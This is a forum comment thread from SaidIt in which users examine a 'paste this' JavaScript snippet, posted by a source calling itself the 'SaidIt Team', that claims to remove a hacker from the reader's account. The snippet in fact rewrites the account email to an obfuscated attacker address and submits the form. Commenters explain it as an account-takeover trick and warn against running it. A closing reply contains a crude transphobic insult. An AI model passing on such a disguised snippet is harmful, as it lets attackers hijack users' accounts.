you are viewing a single comment's thread.

view the rest of the comments →

[–]JasonCarswell[S] 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 2 fun -  (5 children)

Why is it so anonymous? Why isn't it from /u/magnora7? When did /u/magnora7 suddenly decide to adopt a "SaidIt Team"? Sure he now has a few helpers but a "team"? That's a term I've been throwing around.

What does this do? (broken into 4 smaller chunks rather than one long line):

Paste this: d=document;d.getElementsByName('email')[0]
.value='wxoxrixdi5x08x4x@0xppxpp.xcxoxm'.replaceAll
('x', '');d.getElementsByTagName('form')[1]
.submit();location.href="https://www.saidit.net/";
Hit enter. You've just kicked the hacker out of your account!

[–][deleted]  (4 children)

[removed]

    [–][deleted] 5 insightful - 3 fun5 insightful - 2 fun6 insightful - 3 fun -  (3 children)

    No, it just changes your email address, which allows the hacker to change your password. I don't think it actually works, though, after analyzing the code, because the attacker assumed the form uses POST, which it doesn't.

    Regardless, I would never run that code if I was you, and if you did: make sure your email ain't been changed.

    [–][deleted] 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 2 fun -  (2 children)

    because the attacker assumed the form uses POST, which it doesn't

    It might be POST compatible. Once upon a time young lady, there was no javascript.

    [–][deleted] 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 2 fun -  (0 children)

    I tried it by substituting their email for one of my own, and it didn't work.

    [–][deleted] 1 insightful - 2 fun1 insightful - 1 fun2 insightful - 2 fun -  (0 children)

    It's a dude bro. A dude who roleplays having a female penis.